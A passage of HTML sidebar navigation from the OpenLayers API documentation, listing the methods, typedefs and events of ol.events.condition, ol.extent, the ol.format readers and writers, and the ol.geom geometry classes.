<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.events.condition">
<span class="title">
<a href="ol.events.condition.html">ol.events.condition</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.events.condition.altKeyOnly" class="">
<a href="ol.events.condition.html#altKeyOnly">altKeyOnly</a>
</li>
<li data-name="ol.events.condition.altShiftKeysOnly" class="">
<a href="ol.events.condition.html#altShiftKeysOnly">altShiftKeysOnly</a>
</li>
<li data-name="ol.events.condition.always" class="">
<a href="ol.events.condition.html#always">always</a>
</li>
<li data-name="ol.events.condition.click" class="">
<a href="ol.events.condition.html#click">click</a>
</li>
<li data-name="ol.events.condition.mouseOnly" class="">
<a href="ol.events.condition.html#mouseOnly">mouseOnly</a>
</li>
<li data-name="ol.events.condition.never" class="">
<a href="ol.events.condition.html#never">never</a>
</li>
<li data-name="ol.events.condition.noModifierKeys" class="">
<a href="ol.events.condition.html#noModifierKeys">noModifierKeys</a>
</li>
<li data-name="ol.events.condition.platformModifierKeyOnly" class="">
<a href="ol.events.condition.html#platformModifierKeyOnly">platformModifierKeyOnly</a>
</li>
<li data-name="ol.events.condition.pointerMove" class="unstable">
<a href="ol.events.condition.html#pointerMove">pointerMove</a>
</li>
<li data-name="ol.events.condition.shiftKeyOnly" class="">
<a href="ol.events.condition.html#shiftKeyOnly">shiftKeyOnly</a>
</li>
<li data-name="ol.events.condition.singleClick" class="">
<a href="ol.events.condition.html#singleClick">singleClick</a>
</li>
<li data-name="ol.events.condition.targetNotEditable" class="unstable">
<a href="ol.events.condition.html#targetNotEditable">targetNotEditable</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.extent">
<span class="title">
<a href="ol.extent.html">ol.extent</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.extent.applyTransform" class="">
<a href="ol.extent.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.extent.boundingExtent" class="">
<a href="ol.extent.html#boundingExtent">boundingExtent</a>
</li>
<li data-name="ol.extent.buffer" class="">
<a href="ol.extent.html#buffer">buffer</a>
</li>
<li data-name="ol.extent.containsCoordinate" class="">
<a href="ol.extent.html#containsCoordinate">containsCoordinate</a>
</li>
<li data-name="ol.extent.containsExtent" class="">
<a href="ol.extent.html#containsExtent">containsExtent</a>
</li>
<li data-name="ol.extent.containsXY" class="">
<a href="ol.extent.html#containsXY">containsXY</a>
</li>
<li data-name="ol.extent.createEmpty" class="">
<a href="ol.extent.html#createEmpty">createEmpty</a>
</li>
<li data-name="ol.extent.equals" class="">
<a href="ol.extent.html#equals">equals</a>
</li>
<li data-name="ol.extent.extend" class="">
<a href="ol.extent.html#extend">extend</a>
</li>
<li data-name="ol.extent.getBottomLeft" class="">
<a href="ol.extent.html#getBottomLeft">getBottomLeft</a>
</li>
<li data-name="ol.extent.getBottomRight" class="">
<a href="ol.extent.html#getBottomRight">getBottomRight</a>
</li>
<li data-name="ol.extent.getCenter" class="">
<a href="ol.extent.html#getCenter">getCenter</a>
</li>
<li data-name="ol.extent.getHeight" class="">
<a href="ol.extent.html#getHeight">getHeight</a>
</li>
<li data-name="ol.extent.getIntersection" class="">
<a href="ol.extent.html#getIntersection">getIntersection</a>
</li>
<li data-name="ol.extent.getSize" class="">
<a href="ol.extent.html#getSize">getSize</a>
</li>
<li data-name="ol.extent.getTopLeft" class="">
<a href="ol.extent.html#getTopLeft">getTopLeft</a>
</li>
<li data-name="ol.extent.getTopRight" class="">
<a href="ol.extent.html#getTopRight">getTopRight</a>
</li>
<li data-name="ol.extent.getWidth" class="">
<a href="ol.extent.html#getWidth">getWidth</a>
</li>
<li data-name="ol.extent.intersects" class="">
<a href="ol.extent.html#intersects">intersects</a>
</li>
<li data-name="ol.extent.isEmpty" class="">
<a href="ol.extent.html#isEmpty">isEmpty</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.featureloader">
<span class="title">
<a href="ol.featureloader.html">ol.featureloader</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.featureloader.xhr" class="unstable">
<a href="ol.featureloader.html#xhr">xhr</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format">
<span class="title">
<a href="ol.format.html">ol.format</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.format.IGCZ" class="unstable">
<a href="ol.format.html#IGCZ">IGCZ</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.EsriJSON">
<span class="title">
<a href="ol.format.EsriJSON.html">ol.format.EsriJSON</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.EsriJSON#readFeature" class="unstable">
<a href="ol.format.EsriJSON.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.EsriJSON#readFeatures" class="unstable">
<a href="ol.format.EsriJSON.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.EsriJSON#readGeometry" class="unstable">
<a href="ol.format.EsriJSON.html#readGeometry">readGeometry</a>
</li>
<li data-name="ol.format.EsriJSON#readProjection" class="unstable">
<a href="ol.format.EsriJSON.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.EsriJSON#writeFeature" class="unstable">
<a href="ol.format.EsriJSON.html#writeFeature">writeFeature</a>
</li>
<li data-name="ol.format.EsriJSON#writeFeatureObject" class="unstable">
<a href="ol.format.EsriJSON.html#writeFeatureObject">writeFeatureObject</a>
</li>
<li data-name="ol.format.EsriJSON#writeFeatures" class="unstable">
<a href="ol.format.EsriJSON.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.EsriJSON#writeFeaturesObject" class="unstable">
<a href="ol.format.EsriJSON.html#writeFeaturesObject">writeFeaturesObject</a>
</li>
<li data-name="ol.format.EsriJSON#writeGeometry" class="unstable">
<a href="ol.format.EsriJSON.html#writeGeometry">writeGeometry</a>
</li>
<li data-name="ol.format.EsriJSON#writeGeometryObject" class="unstable">
<a href="ol.format.EsriJSON.html#writeGeometryObject">writeGeometryObject</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.Feature">
<span class="title">
<a href="ol.format.Feature.html">ol.format.Feature</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GML">
<span class="title">
<a href="ol.format.GML.html">ol.format.GML</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GML#readFeatures" class="">
<a href="ol.format.GML.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.GML#writeFeatures" class="">
<a href="ol.format.GML.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.GML#writeFeaturesNode" class="unstable">
<a href="ol.format.GML.html#writeFeaturesNode">writeFeaturesNode</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GML2">
<span class="title">
<a href="ol.format.GML2.html">ol.format.GML2</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GML2#readFeatures" class="">
<a href="ol.format.GML2.html#readFeatures">readFeatures</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GML3">
<span class="title">
<a href="ol.format.GML3.html">ol.format.GML3</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GML3#readFeatures" class="">
<a href="ol.format.GML3.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.GML3#writeFeatures" class="">
<a href="ol.format.GML3.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.GML3#writeFeaturesNode" class="unstable">
<a href="ol.format.GML3.html#writeFeaturesNode">writeFeaturesNode</a>
</li>
<li data-name="ol.format.GML3#writeGeometryNode" class="unstable">
<a href="ol.format.GML3.html#writeGeometryNode">writeGeometryNode</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GMLBase">
<span class="title">
<a href="ol.format.GMLBase.html">ol.format.GMLBase</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GMLBase#readFeatures" class="">
<a href="ol.format.GMLBase.html#readFeatures">readFeatures</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GPX">
<span class="title">
<a href="ol.format.GPX.html">ol.format.GPX</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GPX#readFeature" class="">
<a href="ol.format.GPX.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.GPX#readFeatures" class="">
<a href="ol.format.GPX.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.GPX#readProjection" class="">
<a href="ol.format.GPX.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.GPX#writeFeatures" class="">
<a href="ol.format.GPX.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.GPX#writeFeaturesNode" class="unstable">
<a href="ol.format.GPX.html#writeFeaturesNode">writeFeaturesNode</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.GeoJSON">
<span class="title">
<a href="ol.format.GeoJSON.html">ol.format.GeoJSON</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.GeoJSON#readFeature" class="">
<a href="ol.format.GeoJSON.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.GeoJSON#readFeatures" class="">
<a href="ol.format.GeoJSON.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.GeoJSON#readGeometry" class="">
<a href="ol.format.GeoJSON.html#readGeometry">readGeometry</a>
</li>
<li data-name="ol.format.GeoJSON#readProjection" class="">
<a href="ol.format.GeoJSON.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.GeoJSON#writeFeature" class="">
<a href="ol.format.GeoJSON.html#writeFeature">writeFeature</a>
</li>
<li data-name="ol.format.GeoJSON#writeFeatureObject" class="">
<a href="ol.format.GeoJSON.html#writeFeatureObject">writeFeatureObject</a>
</li>
<li data-name="ol.format.GeoJSON#writeFeatures" class="">
<a href="ol.format.GeoJSON.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.GeoJSON#writeFeaturesObject" class="">
<a href="ol.format.GeoJSON.html#writeFeaturesObject">writeFeaturesObject</a>
</li>
<li data-name="ol.format.GeoJSON#writeGeometry" class="">
<a href="ol.format.GeoJSON.html#writeGeometry">writeGeometry</a>
</li>
<li data-name="ol.format.GeoJSON#writeGeometryObject" class="">
<a href="ol.format.GeoJSON.html#writeGeometryObject">writeGeometryObject</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.IGC">
<span class="title">
<a href="ol.format.IGC.html">ol.format.IGC</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.IGC#readFeature" class="unstable">
<a href="ol.format.IGC.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.IGC#readFeatures" class="unstable">
<a href="ol.format.IGC.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.IGC#readProjection" class="unstable">
<a href="ol.format.IGC.html#readProjection">readProjection</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.JSONFeature">
<span class="title">
<a href="ol.format.JSONFeature.html">ol.format.JSONFeature</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.KML">
<span class="title">
<a href="ol.format.KML.html">ol.format.KML</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.KML#readFeature" class="">
<a href="ol.format.KML.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.KML#readFeatures" class="">
<a href="ol.format.KML.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.KML#readName" class="">
<a href="ol.format.KML.html#readName">readName</a>
</li>
<li data-name="ol.format.KML#readNetworkLinks" class="unstable">
<a href="ol.format.KML.html#readNetworkLinks">readNetworkLinks</a>
</li>
<li data-name="ol.format.KML#readProjection" class="">
<a href="ol.format.KML.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.KML#writeFeatures" class="">
<a href="ol.format.KML.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.KML#writeFeaturesNode" class="unstable">
<a href="ol.format.KML.html#writeFeaturesNode">writeFeaturesNode</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.OSMXML">
<span class="title">
<a href="ol.format.OSMXML.html">ol.format.OSMXML</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.OSMXML#readFeatures" class="">
<a href="ol.format.OSMXML.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.OSMXML#readProjection" class="">
<a href="ol.format.OSMXML.html#readProjection">readProjection</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.Polyline">
<span class="title">
<a href="ol.format.Polyline.html">ol.format.Polyline</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.Polyline.decodeDeltas" class="unstable">
<a href="ol.format.Polyline.html#decodeDeltas">decodeDeltas</a>
</li>
<li data-name="ol.format.Polyline.decodeFloats" class="unstable">
<a href="ol.format.Polyline.html#decodeFloats">decodeFloats</a>
</li>
<li data-name="ol.format.Polyline.encodeDeltas" class="unstable">
<a href="ol.format.Polyline.html#encodeDeltas">encodeDeltas</a>
</li>
<li data-name="ol.format.Polyline.encodeFloats" class="unstable">
<a href="ol.format.Polyline.html#encodeFloats">encodeFloats</a>
</li>
<li data-name="ol.format.Polyline#readFeature" class="">
<a href="ol.format.Polyline.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.Polyline#readFeatures" class="">
<a href="ol.format.Polyline.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.Polyline#readGeometry" class="">
<a href="ol.format.Polyline.html#readGeometry">readGeometry</a>
</li>
<li data-name="ol.format.Polyline#readProjection" class="">
<a href="ol.format.Polyline.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.Polyline#writeGeometry" class="">
<a href="ol.format.Polyline.html#writeGeometry">writeGeometry</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.TextFeature">
<span class="title">
<a href="ol.format.TextFeature.html">ol.format.TextFeature</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.TopoJSON">
<span class="title">
<a href="ol.format.TopoJSON.html">ol.format.TopoJSON</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.TopoJSON#readFeatures" class="">
<a href="ol.format.TopoJSON.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.TopoJSON#readProjection" class="">
<a href="ol.format.TopoJSON.html#readProjection">readProjection</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.WFS">
<span class="title">
<a href="ol.format.WFS.html">ol.format.WFS</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.format.WFS.FeatureCollectionMetadata" class="">
<a href="ol.format.WFS.html#FeatureCollectionMetadata">FeatureCollectionMetadata</a>
</li>
<li data-name="ol.format.WFS.TransactionResponse" class="">
<a href="ol.format.WFS.html#TransactionResponse">TransactionResponse</a>
</li>
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.WFS#readFeatureCollectionMetadata" class="">
<a href="ol.format.WFS.html#readFeatureCollectionMetadata">readFeatureCollectionMetadata</a>
</li>
<li data-name="ol.format.WFS#readFeatures" class="">
<a href="ol.format.WFS.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.WFS#readProjection" class="">
<a href="ol.format.WFS.html#readProjection">readProjection</a>
</li>
<li data-name="ol.format.WFS#readTransactionResponse" class="">
<a href="ol.format.WFS.html#readTransactionResponse">readTransactionResponse</a>
</li>
<li data-name="ol.format.WFS#writeGetFeature" class="">
<a href="ol.format.WFS.html#writeGetFeature">writeGetFeature</a>
</li>
<li data-name="ol.format.WFS#writeTransaction" class="">
<a href="ol.format.WFS.html#writeTransaction">writeTransaction</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.WKT">
<span class="title">
<a href="ol.format.WKT.html">ol.format.WKT</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.WKT#readFeature" class="">
<a href="ol.format.WKT.html#readFeature">readFeature</a>
</li>
<li data-name="ol.format.WKT#readFeatures" class="">
<a href="ol.format.WKT.html#readFeatures">readFeatures</a>
</li>
<li data-name="ol.format.WKT#readGeometry" class="">
<a href="ol.format.WKT.html#readGeometry">readGeometry</a>
</li>
<li data-name="ol.format.WKT#writeFeature" class="">
<a href="ol.format.WKT.html#writeFeature">writeFeature</a>
</li>
<li data-name="ol.format.WKT#writeFeatures" class="">
<a href="ol.format.WKT.html#writeFeatures">writeFeatures</a>
</li>
<li data-name="ol.format.WKT#writeGeometry" class="">
<a href="ol.format.WKT.html#writeGeometry">writeGeometry</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.WMSCapabilities">
<span class="title">
<a href="ol.format.WMSCapabilities.html">ol.format.WMSCapabilities</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.WMSCapabilities#read" class="unstable">
<a href="ol.format.WMSCapabilities.html#read">read</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.WMSGetFeatureInfo">
<span class="title">
<a href="ol.format.WMSGetFeatureInfo.html">ol.format.WMSGetFeatureInfo</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.WMSGetFeatureInfo#readFeatures" class="">
<a href="ol.format.WMSGetFeatureInfo.html#readFeatures">readFeatures</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.WMTSCapabilities">
<span class="title">
<a href="ol.format.WMTSCapabilities.html">ol.format.WMTSCapabilities</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.format.WMTSCapabilities#read" class="unstable">
<a href="ol.format.WMTSCapabilities.html#read">read</a>
</li>
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.XML">
<span class="title">
<a href="ol.format.XML.html">ol.format.XML</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.format.XMLFeature">
<span class="title">
<a href="ol.format.XMLFeature.html">ol.format.XMLFeature</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.geom">
<span class="title">
<a href="ol.geom.html">ol.geom</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
<span class="subtitle">Typedefs</span>
<li data-name="ol.geom.GeometryLayout" class="">
<a href="ol.geom.html#GeometryLayout">GeometryLayout</a>
</li>
<li data-name="ol.geom.GeometryType" class="">
<a href="ol.geom.html#GeometryType">GeometryType</a>
</li>
</ul>
<ul class="methods itemMembers">
</ul>
<ul class="fires itemMembers">
</ul>
</li>
<li class="item" data-name="ol.geom.Circle">
<span class="title">
<a href="ol.geom.Circle.html">ol.geom.Circle</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.Circle#applyTransform" class="">
<a href="ol.geom.Circle.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.Circle#changed" class="unstable">
<a href="ol.geom.Circle.html#changed">changed</a>
</li>
<li data-name="ol.geom.Circle#clone" class="unstable">
<a href="ol.geom.Circle.html#clone">clone</a>
</li>
<li data-name="ol.geom.Circle#get" class="">
<a href="ol.geom.Circle.html#get">get</a>
</li>
<li data-name="ol.geom.Circle#getCenter" class="unstable">
<a href="ol.geom.Circle.html#getCenter">getCenter</a>
</li>
<li data-name="ol.geom.Circle#getClosestPoint" class="">
<a href="ol.geom.Circle.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.Circle#getExtent" class="">
<a href="ol.geom.Circle.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.Circle#getFirstCoordinate" class="">
<a href="ol.geom.Circle.html#getFirstCoordinate">getFirstCoordinate</a>
</li>
<li data-name="ol.geom.Circle#getKeys" class="">
<a href="ol.geom.Circle.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.Circle#getLastCoordinate" class="">
<a href="ol.geom.Circle.html#getLastCoordinate">getLastCoordinate</a>
</li>
<li data-name="ol.geom.Circle#getLayout" class="">
<a href="ol.geom.Circle.html#getLayout">getLayout</a>
</li>
<li data-name="ol.geom.Circle#getProperties" class="">
<a href="ol.geom.Circle.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.Circle#getRadius" class="unstable">
<a href="ol.geom.Circle.html#getRadius">getRadius</a>
</li>
<li data-name="ol.geom.Circle#getRevision" class="unstable">
<a href="ol.geom.Circle.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.Circle#getType" class="unstable">
<a href="ol.geom.Circle.html#getType">getType</a>
</li>
<li data-name="ol.geom.Circle#intersectsExtent" class="">
<a href="ol.geom.Circle.html#intersectsExtent">intersectsExtent</a>
</li>
<li data-name="ol.geom.Circle#on" class="">
<a href="ol.geom.Circle.html#on">on</a>
</li>
<li data-name="ol.geom.Circle#once" class="">
<a href="ol.geom.Circle.html#once">once</a>
</li>
<li data-name="ol.geom.Circle#set" class="">
<a href="ol.geom.Circle.html#set">set</a>
</li>
<li data-name="ol.geom.Circle#setCenter" class="unstable">
<a href="ol.geom.Circle.html#setCenter">setCenter</a>
</li>
<li data-name="ol.geom.Circle#setCenterAndRadius" class="unstable">
<a href="ol.geom.Circle.html#setCenterAndRadius">setCenterAndRadius</a>
</li>
<li data-name="ol.geom.Circle#setProperties" class="">
<a href="ol.geom.Circle.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.Circle#setRadius" class="unstable">
<a href="ol.geom.Circle.html#setRadius">setRadius</a>
</li>
<li data-name="ol.geom.Circle#transform" class="">
<a href="ol.geom.Circle.html#transform">transform</a>
</li>
<li data-name="ol.geom.Circle#translate" class="">
<a href="ol.geom.Circle.html#translate">translate</a>
</li>
<li data-name="ol.geom.Circle#un" class="">
<a href="ol.geom.Circle.html#un">un</a>
</li>
<li data-name="ol.geom.Circle#unByKey" class="">
<a href="ol.geom.Circle.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.Circle#unset" class="">
<a href="ol.geom.Circle.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.Geometry">
<span class="title">
<a href="ol.geom.Geometry.html">ol.geom.Geometry</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.Geometry#changed" class="unstable">
<a href="ol.geom.Geometry.html#changed">changed</a>
</li>
<li data-name="ol.geom.Geometry#get" class="">
<a href="ol.geom.Geometry.html#get">get</a>
</li>
<li data-name="ol.geom.Geometry#getClosestPoint" class="">
<a href="ol.geom.Geometry.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.Geometry#getExtent" class="">
<a href="ol.geom.Geometry.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.Geometry#getKeys" class="">
<a href="ol.geom.Geometry.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.Geometry#getProperties" class="">
<a href="ol.geom.Geometry.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.Geometry#getRevision" class="unstable">
<a href="ol.geom.Geometry.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.Geometry#on" class="">
<a href="ol.geom.Geometry.html#on">on</a>
</li>
<li data-name="ol.geom.Geometry#once" class="">
<a href="ol.geom.Geometry.html#once">once</a>
</li>
<li data-name="ol.geom.Geometry#set" class="">
<a href="ol.geom.Geometry.html#set">set</a>
</li>
<li data-name="ol.geom.Geometry#setProperties" class="">
<a href="ol.geom.Geometry.html#setProperties">setProperties</a>
</li>
<li data-name="ol.geom.Geometry#transform" class="">
<a href="ol.geom.Geometry.html#transform">transform</a>
</li>
<li data-name="ol.geom.Geometry#un" class="">
<a href="ol.geom.Geometry.html#un">un</a>
</li>
<li data-name="ol.geom.Geometry#unByKey" class="">
<a href="ol.geom.Geometry.html#unByKey">unByKey</a>
</li>
<li data-name="ol.geom.Geometry#unset" class="">
<a href="ol.geom.Geometry.html#unset">unset</a>
</li>
</ul>
<ul class="fires itemMembers">
<span class="subtitle">Fires</span>
<li data-name="event:change Triggered when the geometry changes." class="unstable">
change Triggered when the geometry changes.
</li>
<li data-name="ol.ObjectEvent#event:propertychange" class="">
<a href="ol.ObjectEvent.html#event:propertychange">propertychange</a>
</li>
</ul>
</li>
<li class="item" data-name="ol.geom.GeometryCollection">
<span class="title">
<a href="ol.geom.GeometryCollection.html">ol.geom.GeometryCollection</a>
</span>
<ul class="members itemMembers">
</ul>
<ul class="typedefs itemMembers">
</ul>
<ul class="methods itemMembers">
<span class="subtitle">Methods</span>
<li data-name="ol.geom.GeometryCollection#applyTransform" class="">
<a href="ol.geom.GeometryCollection.html#applyTransform">applyTransform</a>
</li>
<li data-name="ol.geom.GeometryCollection#changed" class="unstable">
<a href="ol.geom.GeometryCollection.html#changed">changed</a>
</li>
<li data-name="ol.geom.GeometryCollection#clone" class="">
<a href="ol.geom.GeometryCollection.html#clone">clone</a>
</li>
<li data-name="ol.geom.GeometryCollection#get" class="">
<a href="ol.geom.GeometryCollection.html#get">get</a>
</li>
<li data-name="ol.geom.GeometryCollection#getClosestPoint" class="">
<a href="ol.geom.GeometryCollection.html#getClosestPoint">getClosestPoint</a>
</li>
<li data-name="ol.geom.GeometryCollection#getExtent" class="">
<a href="ol.geom.GeometryCollection.html#getExtent">getExtent</a>
</li>
<li data-name="ol.geom.GeometryCollection#getGeometries" class="">
<a href="ol.geom.GeometryCollection.html#getGeometries">getGeometries</a>
</li>
<li data-name="ol.geom.GeometryCollection#getKeys" class="">
<a href="ol.geom.GeometryCollection.html#getKeys">getKeys</a>
</li>
<li data-name="ol.geom.GeometryCollection#getProperties" class="">
<a href="ol.geom.GeometryCollection.html#getProperties">getProperties</a>
</li>
<li data-name="ol.geom.GeometryCollection#getRevision" class="unstable">
<a href="ol.geom.GeometryCollection.html#getRevision">getRevision</a>
</li>
<li data-name="ol.geom.GeometryCollection#getType" class="">
<a href="ol.geom.GeometryCollection.html#getType">getType</a>
</li>
<li data-name="ol.geom.GeometryCollection#intersectsExtent" class="">
<a href="ol.geom.GeometryCollection.html#intersectsExtent">intersectsExtent</a>
</li>
